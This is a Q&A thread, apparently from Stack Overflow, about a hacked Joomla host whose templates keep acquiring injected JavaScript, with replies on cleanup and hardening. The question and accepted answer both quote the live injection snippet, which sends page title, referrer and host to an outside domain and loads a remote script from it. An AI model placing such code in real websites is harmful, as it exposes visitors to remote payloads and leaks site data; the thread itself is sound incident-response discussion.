# Script injection Joomla Templates

Tags: javascript, php, joomla

I manage lots of Joomla Websites, and few months ago, in all of them, started to appear some very strage scripts...

Like this one above:

So i deleted all manually, but they keep appearing again :(

Could someone help understand what is happening? should i edit some file to prevent that happend?

Thanks a lot!

`var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}`

Comment: You might give this a look over. [link](http://stackoverflow.com/questions/34720405/joomla-site-hacked/34733454#34733454)

Answer (score 0, accepted):

So, it was a little complicated! but i found out that my server was hacked

the server structures i had:

```
joomlasite (folder 1)
otherjoomlasite (folder2)
bigjoomlasite (folder3)
(...)
php.ini
```

So in the  public_html folder i found lots of very strange files like!!!

```
public_html
joomlasite
joomlasite.com (hacked issue - so i deleted this folder)
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
otherjoomlasite
otherjoomlasite.org
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
bigjoomlasite (folder3)
bigjoomlasite.io
|____ css (lots of strange files *.php)
|____ sylink (lots of strange files *.php)
alias.php (strange file)
article.php (strange file)
css.php (strange file)
```

So i deleted all the strange files, the joomla folders where ok, i did not find strange files yet!

Did all security change, passwords, etc...

And in all joomla templates deleted the:

```
var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}
```

Look like that all gone stable now :)

Thanks for the answers and sugestions...

Comment: did you find out how this happened ? i'm looking for a way to secure my website from these attacks. We've been hacked many time with that attack, so i guess it's not the last time someone will try to hack your websites with these hacks again

Comment: Hi @Shide , i didn't find out how this happened, but did some actions that helped to prevent, but was no easy solution, since that i didn't have problem until now, don't know if will have this problems on the future. I was using shared hosting, so i changed to vpn machine on digital ocean, started to use nginx reverse proxy as server, and used some scripts on nginx config file to prevent attacks. if u want can put here a link with the script file or give more info about that ;)

Comment: well thanks ! but our hosting provider doesn't really allow us to go into server deep configuration. actualy i got fed up of joomla right now, so i'm just going to develop a new website with AWS/nginx/NodeJS and that'll be fine. Thanks for your comment !

Answer (score 2):

If scripts are appearing in your templates, I assume you have been hacked. Try restoring all file content to a time before this happened for the first time, and resetting all passwords. Then upgrade to the latest joomla version to prevent hacking.

If you are not sure when the attack happened, and so cannot roll back to a previous version, then replace ALL code with freshly downloaded code (Joomla core, downloaded components etc. ). Review the images folder to check it only contains images (no php scripts or other suspicious looking files). If you have custom code, review this to check that nothing is injected in this. And again reset all passwords (ftp, user passwords, db-passwords etc). Then you'll be OK.